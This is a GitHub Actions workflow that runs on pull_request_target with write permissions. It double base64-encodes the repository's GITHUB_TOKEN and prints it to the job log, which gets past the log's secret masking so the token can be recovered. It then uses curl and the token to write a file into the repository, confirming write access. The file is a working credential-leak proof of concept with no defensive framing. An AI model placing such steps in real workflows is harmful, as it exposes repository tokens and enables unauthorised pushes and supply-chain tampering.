name: Double Encode GitHub Token on PR

on:
  pull_request_target:
    branches:
      - "*"

permissions:
  contents: write  # Allows pushing files, creating commits, etc.
  pull-requests: write  # Optional: if you also want to comment on PRs

jobs:
  encode-token:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

    steps:
      - name: Double base64 encode GITHUB_TOKEN
        run: |
          echo "$GITHUB_TOKEN" | base64 | base64 > double_encoded.txt
          echo "Double Encoded GITHUB_TOKEN:"
          cat double_encoded.txt

      - name: Check if token has write permission
        run: |
          curl -i -X PUT \
            -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
            -H "Content-Type: application/json" \
            -d '{"message":"test","content":"dGVzdA=="}' \
            https://api.github.com/repos/${{ github.repository }}/contents/test22.txt
      
